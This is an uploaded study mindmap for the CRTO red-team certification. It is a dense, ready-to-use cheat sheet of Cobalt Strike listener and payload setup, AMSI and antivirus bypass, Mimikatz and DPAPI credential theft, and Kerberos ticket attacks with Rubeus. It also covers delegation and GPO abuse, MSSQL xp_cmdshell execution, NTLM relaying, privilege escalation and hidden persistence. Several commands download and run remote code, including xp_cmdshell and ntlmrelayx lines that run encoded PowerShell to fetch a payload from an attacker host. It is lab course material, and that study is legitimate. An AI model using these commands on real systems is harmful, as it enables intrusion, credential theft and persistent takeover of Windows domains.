CRTO Mindmap

Uploaded by

Marc Vives

Listener Management

Egress (Beacon => TeamServer)
- HTTP/S
  - Payload = Beacon HTTP/S
  - Port = 80/443
  - HTTP Hosts = IP/domain
  - HTTP Host (stager) = IP/domain
- DNS
  - Payload = Beacon DNS
  - DNS Hosts = sub.domain.es
  - DNS Host (stager) = sub.domain.es

P2P (Beacon => Beacon)
- TCP
  - Payload = Beacon TCP
  - Port = XXXX
  - Bind to localhost only: Yes = tcp-local (127.0.0.1), No = tcp (0.0.0.0)
- SMB
  - Payload = Beacon SMB
  - Pipename (C2), visible with: PS C:\> ls \\.\pipe\  (e.g. TSVCPIPE-5a71ebb3-cc01-49a9-bd85-4bbd37495169)

Pivot Listeners
- Right click on Beacon > Pivoting > Listener

Generating Payloads
- HTA (HTML Application): Generate .hta
- MS Office Macro: Generate a VBA for Macros
- Stager Payload Generator: only generates payloads for egress listeners, but supports x86 and x64.
- Stageless Payload Generator: as above, including P2P.
- Windows Stager Payload: EXE, Service EXE or DLL
- Windows Stageless Payload: EXE, Service EXE, DLL, shellcode, as well as PowerShell. Only for P2P.
- Windows Stageless Generate All Payloads: generates every stageless payload variant, for every listener, in x86 and x64. Generate All Payloads at the start.

Starting CS
- Running as a service: sudo vim /etc/systemd/system/teamserver.service
- Headless CS (agscript): ./agscript [host] [port] [user] [password] [script.cna]
  - script.cna, inside the on ready { ... } event:
    $payload = artifact_payload("listener_name", "payload_type", "arch");
    site_host("ip_server", port, "/resource", $payload, "text/plain", "description", false);
- Cobalt Profile: ./c2lint c2-profiles/normal/webbug.profile, then restart
- Artifact Kit (disk): ./build.sh pipe VirtualAlloc 277492 5 false false /mnt/c/Tools/cobaltstrike/artifacts, then Cobalt Strike > Script Manager > Load
- Resource Kit (memory): ./build.sh /mnt/c/Tools/cobaltstrike/resources, then Cobalt Strike > Script Manager > Load
- Bypass (profile post-ex block):
    post-ex {
      set amsi_disable "true";
      set spawnto_x64 "%windir%\\sysnative\\dllhost.exe";
      set spawnto_x86 "%windir%\\syswow64\\dllhost.exe";
    }

Lateral Movement
- jump [method] [target] [listener(SMB)]: psexec/psexec64, psexec_psh (32 bits), winrm/winrm64
- remote-exec [method] [target] [command]: psexec, winrm, wmi
  - wmi: cd \\target\share$ ; upload payload-smb.exe ; remote-exec wmi target.domain C:\Windows\payload-smb.exe ; link target pipe
- Invoke-DCOM.ps1: powershell Invoke-DCOM -ComputerName wtarget -Method MMC20.Application -Command C:\Windows\payload-smb.exe

Processes
- ps (look for Sysmon64, MsMpEng (Defender), elastic-XXX)
- spawn as, if credentials or user are interesting
Privileges
- getprivs
User Sessions
- net logons
Seatbelt.exe
- -group=system ; OSInfo -ComputerName=Hostname ; TokenPrivileges ; WindowsVault (list vaults) ; WindowsCredentialFiles ; Certificates

Mimikatz
- logonpasswords: mimikatz !sekurlsa::logonpasswords -> NTLM hashes -> PTH: pth Domain\User HashNTLM
- SAM: mimikatz !lsadump::sam
- Kerberos AES256 keys: mimikatz !sekurlsa::ekeys -> aes256_hmac (first and large)
- DCC: mimikatz !lsadump::cache -> Hashcat => $DCC2$<iterations>#<username>#<hash>

DPAPI
- Vaults: run vaultcmd /list (Vault GUID) ; Web Credentials / Windows Credentials: run vaultcmd /listcreds:"Windows Credentials" /all
- BLOBS: ls C:\Users\bfarmer\AppData\Local\Microsoft\Credentials -> MasterKey GUID
- MasterKey: ls C:\Users\User\AppData\Roaming\Microsoft\Protect\S-X-X-XX -> BLOB + MasterKey GUID
- How:
  - mimikatz !sekurlsa::dpapi (as admin)
  - mimikatz dpapi::masterkey /in:C:\Users\User\AppData\Roaming\Microsoft\Protect\S-X-X-XX-\masterkeyGUID /rpc (more OPSEC, no lsass interaction)
  - mimikatz dpapi::cred /in:C:\Users\USer\AppData\Local\Microsoft\Credentials\BLOB /masterkey:key_obtained -> plain text password -> make_token .\User Pass

LAPS
- GetConfig (LAPS GPOs): powershell Get-DomainGPO | ? { $_.DisplayName -like "*laps*" } | select DisplayName, Name, GPCFileSysPath | fl
  - ls \\gpcfilesyspath\Machine ; download registry.pol ; Parse-PolFile .\Desktop\Registry.pol
- Principals allowed to read the password: powershell Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "ms-Mcs-AdmPwd" -and $_.ActiveDirectoryRights -match "ReadProperty" } | select ObjectDn, SecurityIdentifier
  - powershell ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1107
- Computers with LAPS: powershell Get-DomainComputer | ? { $_."ms-Mcs-AdmPwdExpirationTime" -ne $null } | select dnsHostName
- Read password: powershell Get-DomainComputer -Identity <Computer> -Properties ms-Mcs-AdmPwd ; make_token .\LAPSAdmin Password
- LAPSToolkit: powershell-import C:\Tools\LAPSToolkit\LAPSToolkit.ps1 ; powershell Find-LAPSDelegatedGroups

PowerView
- powershell-import C:\Tools\PowerSploit\Recon\PowerView.ps1
- Shares: powershell Find-DomainShare -CheckShareAccess ; powershell Find-InterestingDomainShareFile -Include *.doc*, *.xls*, *.csv, *.ppt*
- Get users from groups whose name contains XXX: powershell Get-DomainGroup -Identity *SQL* | % { Get-DomainGroupMember -Identity $_.distinguishedname | select groupname, membername }

Trusts
- powershell Get-DomainTrust ; powershell Get-DomainTrust -Domain <Domain> (CHECK ALL)
- Get DC server: powershell Get-DomainComputer -Domain dev-studio.com -Properties DnsHostName
- Groups with "admins": ADSearch.exe --search "(&(objectCategory=group)(cn=*Admins))"
- Inbound: find users outside of their domain -> obtain members -> pwn user and ASKTGT -> referral ticket -> TGS for service in trusting domain -> PTT -> jump psexec -> DCSync
  - powershell Get-DomainForeignGroupMember -Domain dev-studio.com
  - powershell Get-DomainGroupMember -Identity "Studio Admins" | select MemberName
  - powershell ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1120
  - execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:nlamb /domain:dev.cyberbotic.io /aes256:a779fa8afa28d66d155d9d7c14d394359c5d29a86b6417cb94269e2e84c4cee4 /nowrap
  - execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgs /service:krbtgt/dev-studio.com /domain:dev.cyberbotic.io /dc:dc-2.dev.cyberbotic.io /ticket:doIFwj[...]MuaW8= /nowrap
  - execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgs /service:cifs/dc.dev-studio.com /domain:dev-studio.com /dc:dc.dev-studio.com /ticket:doIFoz[...]NPTQ== /nowrap
  - DCSync (mimikatz lsadump::dcsync): dcsync domain.controller.domain Domain\krbtgt
- Outbound: obtain TDO -> search trust accounts in trusting domain -> ASKTGT -> impersonation (you need domain admin)
  - powershell Get-DomainObject -Identity "CN=msp.org,CN=System,DC=cyberbotic,DC=io" | select objectGuid
  - mimikatz @lsadump::dcsync /domain:cyberbotic.io /guid:{b93d2e36-48df-46bf-89d5-2fc22c139b43}
  - execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(objectCategory=user)"
  - execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:CYBER$ /domain:msp.org /rc4:f3fc2312d9d1f80b78e67d55d41ad496 /nowrap

Extracting Kerberos Tickets (Rubeus)
- execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe
- List Kerberos tickets: Rubeus.exe triage (admins => all tickets)
- Rubeus.exe dump /luid:0x7049f /service:krbtgt /nowrap (TGT => service krbtgt/domain ; TGS => services/domain)
- Pass The Ticket (TGT/TGS):
  - Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:dev.cyberbotic.io /username:bfarmer /password:FakePass123 -> get ProcessID
  - Rubeus.exe ptt /luid:0x798c2c /ticket:doIFuj[...]lDLklP
  - steal_token ProcessID
  - Validate: ls \\web.dev.cyberbotic.io\c$
  - Revert: rev2self ; kill ProcessID

Reconnaissance (ADSearch)
- execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe
- Kerberoasting: ADSearch.exe --search "(&(objectCategory=user)(servicePrincipalName=*))" --attributes cn,servicePrincipalName,samAccountName
- ASREProasting: ADSearch.exe --search "(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" --attributes cn,distinguishedname,samaccountname
- Unconstrained: ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname
- Constrained: ADSearch.exe --search "(&(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes dnshostname,samaccountname,msds-allowedtodelegateto --json

Kerberoasting
- Rubeus.exe kerberoast /simple /nowrap
- OPSEC: Rubeus.exe kerberoast /user:user /nowrap
ASREProasting
- Rubeus.exe asreproast /simple /nowrap
- OPSEC: Rubeus.exe asreproast /user:squid_svc /nowrap

Unconstrained Delegation
- Admin on vulnerable machines
- Rubeus.exe monitor /interval:10 /nowrap (ends with job & jobkill)
- Force auth: SharpSpoolTrigger.exe target_machine listener_machine (vulnerable on Unconstrained)
- Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFwj[...]MuSU8=
- S4U2Self: a TGT from the machine account will fail (Unconstrained) -> Rubeus.exe s4u /impersonateuser:nlamb /self /altservice:cifs/dc-2.dev.cyberbotic.io /user:dc-2$ /ticket:doIFuj[...]lDLklP /nowrap /ptt -> OK

Constrained Delegation
- Pwn user trusted for delegation (SamAccountName) ; services allowed on machine ; admin on dnshostname
- TGT of principal (user or machine) trusted for constrained delegation:
  - NTLM: Rubeus.exe asktgt /user:jking /ntlm:5...c /nowrap
  - AES256 (more OPSEC): Rubeus.exe asktgt /user:jking /aes256:4...c6 /domain:DEV /opsec /nowrap
- Rubeus.exe s4u /impersonateuser:<user_to_impersonate> /msdsspn:<service allowed to delegate> /user:<principal TGT pwnd> /ticket:<TGT for /user> /nowrap
- /altservice: Rubeus.exe s4u /impersonateuser:nlamb /msdsspn:cifs/dc-2.dev.cyberbotic.io /altservice:ldap /user:sql-2$ /ticket:doIFpD[...]MuSU8= /nowrap
- Use TGS/TGT for PTT -> DCSync

Over Pass The Hash (OPTH+PTT)
- Rubeus.exe asktgt /user:jking /aes256:4...6 /domain:DEV /opsec /nowrap /ptt
- Certificates: Rubeus.exe asktgt /user:nlamb /certificate:<Base64Cert> /password:<cert_pass> (not necessary) /nowrap

RBCD (without local admin)
- Privs on computer: powershell Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "WriteProperty|GenericWrite|GenericAll|WriteDacl" -and $_.SecurityIdentifier -match "S-1-5-21-569305411-121244042-2357301523-[\d]{4,10}" }
  - powershell ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1107
- powershell Get-DomainComputer -Identity wkstn-2 -Properties objectSid
- powershell $rsd = New-Object Security.AccessControl.RawSecurityDescriptor "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;<SID>)"; $rsdb = New-Object byte[] ($rsd.BinaryLength); $rsd.GetBinaryForm($rsdb, 0); Get-DomainComputer -Identity "dc-2" | Set-DomainObject -Set @{'msDS-AllowedToActOnBehalfOfOtherIdentity' = $rsdb} -Verbose
- Machine TGT (TGT of machine trusted for RBCD) -> S4U (S4U2Self+S4U2Proxy)
- Check addComputers: powershell Get-DomainObject -Identity "DC=dev,DC=cyberbotic,DC=io" -Properties ms-DS-MachineAccountQuota
  - StandIn.exe --computer EvilComputer --make
  - Get AES256: Rubeus.exe hash /password:oIrpupAtF1YCXaw /user:EvilComputer$ /domain:dev.cyberbotic.io
  - Rubeus.exe asktgt /user:EvilComputer$ /aes256:7A79DCC14E6508DA9536CD949D857B54AE4E119162A865C40B3FFD46059F7044 /nowrap

Shadow Credentials
- execute-assembly C:\Tools\Whisker\Whisker\bin\Release\Whisker.exe list /target:dc-2$
- Add new key: execute-assembly C:\Tools\Whisker\Whisker\bin\Release\Whisker.exe add /target:dc-2$
- Rubeus.exe asktgt /user:dc-2$ /certificate:MIIJuA[...snip...]ICB9A= /password:"y52EhYqlfgnYPuRb" /nowrap

GPOs
- Check modifiable: powershell Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "CreateChild|WriteProperty" -and $_.SecurityIdentifier -match "S-1-5-21-569305411-121244042-2357301523-[\d]{4,10}" }
  - powershell ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1107
  - powershell Get-DomainGPO -Identity "<ObjectDN>" | select displayName, gpcFileSysPath
- Check which OU the GPO applies to: powershell Get-DomainOU -GPLink "{AD2F58B9-97A0-4DBC-A535-B4ED36D5DD2F}" | select distinguishedName
  - powershell Get-DomainComputer -SearchBase "distinguishedname" | select dnsHostName
- Modify (SharpGPOAbuse): execute-assembly C:\Tools\SharpGPOAbuse\SharpGPOAbuse\bin\Release\SharpGPOAbuse.exe
  - Find writeable share: powershell Find-DomainShare -CheckShareAccess
  - Upload payload (reverse port forward & FW rules, need admin)
  - AddComputerScript (reboot): SharpGPOAbuse.exe --AddComputerScript --ScriptName startup.bat --ScriptContents "start /b \\dc-2\software\dns_x64.exe" --GPOName "Vulnerable GPO"
  - AddComputerTask (it is immediate): SharpGPOAbuse.exe --AddComputerTask --TaskName "Install Updates" --Author NT AUTHORITY\SYSTEM --Command "C:\Windows\System32\cmd.exe" --Arguments "/c powershell -w hidden -enc EncBase64=" --GPOName "Vulnerable GPO"
  - Apply GPO: gpupdate /force
- Create
  - Who can create: powershell Get-DomainObjectAcl -Identity "CN=Policies,CN=System,DC=dev,DC=cyberbotic,DC=io" -ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" -and $_.ActiveDirectoryRights -contains "CreateChild" } | % { ConvertFrom-SID $_.SecurityIdentifier }
  - Check OU links: powershell Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "GP-Link" -and $_.ActiveDirectoryRights -match "WriteProperty" } | select ObjectDN,ActiveDirectoryRights,ObjectAceType,SecurityIdentifier | fl
  - powershell ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1107
  - powershell New-GPO -Name "Evil GPO"
  - powershell Set-GPPrefRegistryValue -Name "Evil GPO" -Context Computer -Action Create -Key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" -ValueName "Updater" -Value "C:\Windows\System32\cmd.exe /c \\dc-2\software\dns.exe" -Type ExpandString
  - powershell Get-GPO -Name "Evil GPO" | New-GPLink -Target "OU=Workstations,DC=dev,DC=cyberbotic,DC=io"
  - Reboot

Process Injection
- shinject: inject any arbitrary shellcode from a binary file on your attacking machine
- inject PID arch P2PListenerName: inject a full Beacon payload for the specified listener

MSSQL
- PowerUpSQL: powershell-import C:\Tools\PowerUpSQL\PowerUpSQL.ps1
  - Discover servers: powershell Get-SQLInstanceDomain
  - Check all servers: powershell Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLServerInfo
  - Get info: powershell Get-SQLServerInfo -Instance "server.fqdn,1433"
  - Validate connection: powershell Get-SQLConnectionTest -Instance "server.fqdn,1433" | fl
  - Execute queries: powershell Get-SQLQuery -Instance "sql-2.dev.cyberbotic.io,1433" -Query "<query>"
  - Lateral movement: powershell Get-SQLServerLinkCrawl -Instance "sql-2.dev.cyberbotic.io,1433"
  - Command execution: powershell Invoke-SQLOSCmd -Instance "sql-2.dev.cyberbotic.io,1433" -Command "whoami" -RawResults ; powershell Invoke-SQLOSCmd -Instance "sql-2.dev.cyberbotic.io,1433" -Command "command (escape \")" -RawResults
  - SQLColumnSampleDataThreaded
- SQLRecon: execute-assembly C:\Tools\SQLRecon\SQLRecon\bin\Release\SQLRecon.exe
  - Check our roles & rights: SQLRecon.exe -a windows -s sql-2.dev.cyberbotic.io,1433 -m whoami
  - Execute queries: SQLRecon.exe -a windows -s sql-2.dev.cyberbotic.io,1433 -m query -o "<query>"
  - Check impersonation: SQLRecon.exe -a windows -s sql-2.dev.cyberbotic.io,1433 -m impersonate ; SQLRecon.exe -a windows -s sql-2.dev.cyberbotic.io,1433 -m iwhoami -i DEV\mssql_svc
- Impacket mssqlclient (WSL): proxychains mssqlclient.py -windows-auth DEV/bfarmer@10.10.122.25
- Check Kerberoasting: search the SPN for the mssql service (Domain\mssql_svc)
- Impersonation:
    SELECT * FROM sys.server_permissions WHERE permission_name = 'IMPERSONATE';
    SELECT name, principal_id, type_desc, is_disabled FROM sys.server_principals;
    EXECUTE AS login = 'DEV\mssql_svc'; SELECT IS_SRVROLEMEMBER('sysadmin');
- Lateral movement (linked servers):
    SELECT srvname, srvproduct, rpcout FROM master..sysservers;
    SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'select @@servername');
    SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'SELECT * FROM sys.configurations WHERE name = ''xp_cmdshell''');
    SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'select @@servername; exec xp_cmdshell ''powershell -w hidden -enc EncBase64 ''')
    EXEC('sp_configure ''show advanced options'', 1; reconfigure;') AT [sql-1.cyberbotic.io]
    EXEC('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT [sql-1.cyberbotic.io]
- Remote Code Execution
  - Enable xp_cmdshell: sp_configure 'Show Advanced Options', 1; RECONFIGURE; sp_configure 'xp_cmdshell', 1; RECONFIGURE;
  - Check: SELECT value FROM sys.configurations WHERE name = 'xp_cmdshell';
  - Execute command: EXEC xp_cmdshell 'whoami'; EXEC xp_cmdshell 'powershell -w hidden -c "iex (new-object net.webclient).downloadstring("""http://wkstn-2:8080/b""")"';

ADCS (Certify)
- execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe
- Find CAs: Certify.exe cas
- Templates: Certify.exe find /vulnerable
  - Permissions: Enrollment Rights ; Write Owner, WriteDACL, WriteProperty (principal owned)
  - msPKI-Certificate-Name-Flag: ENROLLEE_SUPPLIES_SUBJECT
- Abuse: Certify.exe request /ca:dc-2.dev.cyberbotic.io\sub-ca /template:CustomUser /altname:<user>
  - Save cert in cert.pem file
  - openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
  - Base64 for Rubeus: cat cert.pfx | base64 -w 0
- Persistence: User ; Computer (S4U2Self)

NTLM Relaying
- Config: socks 1080 socks5 disableNoAuth socks_user socks_password EnableLogging ; visibility, rule & port forward
- Reverse port forward: rportfwd 8445 localhost 445 ; rportfwd 8080 localhost 80
- Firewall rules (as admin): powershell New-NetFirewallRule -DisplayName "8445-In" -Direction Inbound -Protocol TCP -Action Allow -LocalPort 8445 ; delete: powershell Remove-NetFirewallRule -DisplayName "8445-In"
- PortBender (SYSTEM): cd C:\Windows\system32\drivers ; upload C:\Tools\PortBender\WinDivert64.sys ; Cobalt Strike > Script Manager > load PortBender.cna ; PortBender redirect 445 8445
- Relay (SMB): sudo proxychains ntlmrelayx.py -t smb://10.10.122.10 -smb2support --no-http-server --no-wcf-server -c 'powershell -nop -w hidden -enc aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQAyADMALgAxADAAMgA6ADgAMAA4ADAALwBiACIAKQA=' (no Cobalt IP)
- Relay (ADCS): sudo proxychains ntlmrelayx.py -t https://10.10.122.10/certsrv/certfnsh.asp -smb2support --adcs --no-http-server
- Force auth: execute-assembly C:\Tools\SharpSystemTriggers\SharpSpoolTrigger\bin\Release\SharpSpoolTrigger.exe 10.10.122.30 10.10.123.102

Pivoting
- Socks Proxy: Socks 4: socks 1080 ; Socks 5: socks 1080 socks5 disableNoAuth socks_user socks_password EnableLogging ; socks stop
  - Linux (Proxychains): sudo vim /etc/proxychains.conf ; proxychains nmap -n -Pn -sT -p445,3389,4444,5985 10.10.122.10
  - Windows (Proxifier): runas /netonly /user:DEV\bfarmer mmc.exe (powershell as admin) -> allows us to map ADUC, interesting for enumeration
- Reverse Port Forward (visibility, rule & port forward): rportfwd [machine_port] [Cobalt IP] [Cobalt Port] ; rportfwd stop
  - Firewall rules (as admin)
  - Check if listening: run netstat -anp tcp ; sudo ss -lpnt
- Connect / Link (if P2P): connect localhost 4444 ; link target pipe

Privilege Escalation
- SharpUp: execute-assembly C:\Tools\SharpUp\SharpUp\bin\Release\SharpUp.exe
  - Get modifiable services: SharpUp.exe audit ModifiableServices
  - Unquoted service paths: SharpUp.exe audit UnquotedServicePath
- Windows Services: run sc query (Service) ; run sc qc Service (binary path, startup type, service status, log on as, dependents & dependencies) ; run sc start Service ; run sc stop Service ; powershell Get-Service
- Weak Service Permissions
  - Check: powershell-import C:\Tools\Get-ServiceAcl.ps1 ; powershell Get-ServiceAcl -Name NameVulnService | select -expand Access -> vulnerable if IdentityReference: myUser and ServiceRights: ChangeConfig
  - Get vuln path: run sc qc NameVulnService
  - Upload payload: upload C:\Payloads\tcp-local_x64.svc.exe
  - Reconfigure binary: run sc config NameVulnService binPath= C:\Temp\tcp-local_x64.svc.exe
  - Stop and then start the service: run sc stop NameVulnService ; run sc start NameVulnService
  - connect localhost 4444
- Unquoted Service Paths
  - Search unquoted and spaced paths: run wmic service get name, pathname
  - CreateFiles privilege: powershell Get-Acl -Path "C:\ServicePath\Service-file" | fl (find a writeable file)
  - Create and upload .exe: copy "tcp-local_x64.svc.exe" "service.exe" ; upload service.exe
  - run sc stop VulnService1 ; run sc start VulnService1
- Weak Service Binary Permissions (Modify privilege)
  - download service.exe ; mv service.exe serviceVuln.exe
  - run sc stop service.exe ; upload service.exe ; run sc start NameVulnService3
- UAC Bypasses (Elevate Kit): Cobalt Strike > Script Manager > load ; elevate uac-schtasks tcp-local
- SeImpersonatePrivilege (SweetPotato.exe): Seatbelt.exe TokenPrivileges ; SweetPotato.exe -p C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -a "-w hidden -enc EncBase64" -> NT Authority\System
- COM Hijacks

Host Persistence (SharPersist.exe)
- Task Scheduler: SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc BASE64" -n "Updater" -m add -o hourly
- Startup Folder: SharPersist.exe -t startupfolder -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc BASE64" -f "UserEnvSetup" -m add
- Registry Autorun
  - Any user logon (SYSTEM privs): SharPersist.exe -t reg -c "C:\ProgramData\Payload.exe" -a "/q /n" -k "hklmrun" -v "ServiceName" -m add
  - Specific user logon: SharPersist.exe -t reg -c "C:\ProgramData\Payload.exe" -a "/q /n" -k "hkcurun" -v "ServiceName" -m add
- Services (OK 4 privs): use SVC payload ; upload tcp-local_x64.svc.exe ; mv tcp-local_x64.svc.exe legit-svc.exe ; SharPersist.exe -t service -c "C:\Windows\legit-svc.exe" -n "legit-svc" -m add ; reboot
- WMI Event Subscriptions (PowerLurk.ps1): powershell-import C:\Tools\PowerLurk.ps1
  - Create (EventFilter, EventConsumer, FilterToConsumerBinding): powershell Register-MaliciousWmiEvent -EventName WmiBackdoor -PermanentCommand "C:\Windows\dns_x64.exe" -Trigger ProcessStart -ProcessName notepad.exe
